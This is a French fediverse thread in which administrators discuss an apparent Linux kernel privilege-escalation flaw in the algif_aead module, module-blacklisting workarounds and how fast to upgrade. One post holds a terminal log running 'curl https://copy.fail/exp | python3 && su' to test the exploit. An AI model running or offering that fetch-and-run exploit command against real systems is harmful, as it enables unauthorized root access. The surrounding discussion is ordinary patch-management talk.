Post B5ocHephxDh18BSyhM by breizh@pleroma.breizh.pm
 (DIR) More posts by breizh@pleroma.breizh.pm
 (DIR) Post #B5oZyNOGNicHchJ89Q by AYz3YbdyXoXnWNtcau.aeris@firefish.imirhil.fr
       0 likes, 0 repeats
       
       Mettez à jour tous vos Linux en kernel 7.xTout de suite. Oui, là maintenant.Vraiment.https://copy.fail/
       
 (DIR) Post #B5oaBnSyk6kSGFue0m by benjamin@piaille.fr
       0 likes, 0 repeats
       
       @aeris ou juste : sudo suecho "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
       
 (DIR) Post #B5oaBngRw1WWw2DP0a by AYz3YbdyXoXnWNtcau.aeris@firefish.imirhil.fr
       0 likes, 0 repeats
       
       @benjamin@piaille.fr Oui aussi. Mais bon.
       
 (DIR) Post #B5oaX7BIde7FUFoBzk by benjamin@piaille.fr
       0 likes, 0 repeats
       
       @aeris mais bon quoi ? C'est déjà ça, tout le monde ne peut pas rebooter toutes ses infras aujourd'hui en linux 7.0 hein ;)
       
 (DIR) Post #B5oaX7VVQWHMUvGKUS by AYz3YbdyXoXnWNtcau.aeris@firefish.imirhil.fr
       0 likes, 0 repeats
       
       @benjamin@piaille.fr Alors pour le coup c’est un très très bon stress test pour voir qui est ready pour sa conformité article 32 RGPD 🤣
       
 (DIR) Post #B5oaap8Pg2T8fuE8Qa by AYz3YbdyXoXnWNtcau.aeris@firefish.imirhil.fr
       0 likes, 0 repeats
       
       @benjamin@piaille.fr Les infras qui vont être incapables d’upgrade dans un délai raisonnable (et on compte plutôt en jours qu’en semaines/mois) vont de facto démontrer ne pas avoir de capacité d’action en cas de faille kernel.
       
 (DIR) Post #B5ob7hFI1suhlP7P5k by benjamin@piaille.fr
       0 likes, 0 repeats
       
       @aeris et bien pas du tout : poser un correctif fiable ne nécessitant pas de mise à jour noyau ou de reboot peut être 100% suffisant, et on n'a donc pas à paniquer et à mettre à jour vers Linux 7.0 de manière inconsidérée.
       
 (DIR) Post #B5ob7hS3GR7cOz5az2 by AYz3YbdyXoXnWNtcau.aeris@firefish.imirhil.fr
       0 likes, 0 repeats
       
       @benjamin@piaille.fr Oui sauf que là on a juste de la chance que ça soit corrigeable temporairement. On pouvait pas désactiver les modules, on attendait 3 mois d’avoir des reboot des hyperviseurs ?
       
 (DIR) Post #B5obUsNomoZkxzA0OG by benjamin@piaille.fr
       0 likes, 0 repeats
       
       @aeris on peut désactiver le module, donc on ne panique pas et on ne fait pas n'importe quoi, en effet :)
       
 (DIR) Post #B5obUscLumCZh3xc2q by AYz3YbdyXoXnWNtcau.aeris@firefish.imirhil.fr
       0 likes, 0 repeats
       
       @benjamin@piaille.fr Et on fait en sorte d’être capable de mettre à jour ses kernels en quelques heures si nécessaires 😉Là on a juste du bol monstrueux d’avoir des contre-mesures possibles. Et pas autre chose.
       
 (DIR) Post #B5ocHephxDh18BSyhM by breizh@pleroma.breizh.pm
       0 likes, 0 repeats
       
       @aeris Ça a été patché par les distros avant l’annonce, non ? J’ai testé sur plusieurs machines Arch et Debian oldstable, ça marche pas dessus.
       
 (DIR) Post #B5ocHf3B98T5nxljhA by AYz3YbdyXoXnWNtcau.aeris@firefish.imirhil.fr
       0 likes, 0 repeats
       
       @breizh@pleroma.breizh.pm Ça a pas été patch et ça marche globalement bien partout.
       
 (DIR) Post #B5od0PGueniTtrWsEK by breizh@pleroma.breizh.pm
       0 likes, 0 repeats
       
       @aeris Ah, j’ai trouvé une Arch pas à jour qui est concernée. Oups ahah. Mais du coup ouais, suffit de mettre à jour et c’est bon (et même pas en 7.0, les machines Arch où ça marche pas sont en 6​.19​.14).
       
 (DIR) Post #B5od0PZhWwkGq8JsW0 by AYz3YbdyXoXnWNtcau.aeris@firefish.imirhil.fr
       0 likes, 0 repeats
       
       @breizh@pleroma.breizh.pm Pourtant la CVE dit bien « no fix available » partout.
       
 (DIR) Post #B5odBG7H2MtIgrCB8q by AYz3YbdyXoXnWNtcau.aeris@firefish.imirhil.fr
       0 likes, 0 repeats
       
       @breizh@pleroma.breizh.pm Et le fix côté kernel n’est dispo que sur la 7.x
       
 (DIR) Post #B5odPXrHrwY5lqWvEO by AYz3YbdyXoXnWNtcau.aeris@firefish.imirhil.fr
       0 likes, 0 repeats
       
       @breizh@pleroma.breizh.pm la 7.0.2 est sous arch depuis 2 jourshttps://gitlab.archlinux.org/archlinux/packaging/packages/linux/-/commit/6dee9a4eb85992dc8c3c0836a7996c55c07806b2
       
 (DIR) Post #B5odf0xTxUKEMlnuWu by breizh@pleroma.breizh.pm
       0 likes, 0 repeats
       
       @aeris [breizh@fw16-40520066 ~]$ uname -aLinux fw16-40520066 6.19.14-arch1-1.1 #1 SMP PREEMPT_DYNAMIC Sat, 25 Apr 2026 07:36:22 +0000 x86_64 GNU/Linux11:48:22 OK[breizh@fw16-40520066 ~]$ curl https://copy.fail/exp | python3 && su  % Total    % Received % Xferd  Average Speed  Time    Time    Time   Current                                 Dload  Upload  Total   Spent   Left   Speed100    731   0    731   0      0   7853      0                              0Mot de passe : su: Erreur de manipulation du jeton d'authentificationMot de passe :su: Erreur de manipulation du jeton d'authentification11:48:35 Error 1Va savoir. Et pourtant :$ cat /proc/modules | grep algif_aeadalgif_aead 12288 0 - Live 0x0000000000000000af_alg 32768 7 algif_aead,algif_hash,algif_skcipher, Live 0x0000000000000000
       
 (DIR) Post #B5odf1Cj2oWD82w5I0 by AYz3YbdyXoXnWNtcau.aeris@firefish.imirhil.fr
       0 likes, 0 repeats
       
       @breizh@pleroma.breizh.pm Zarb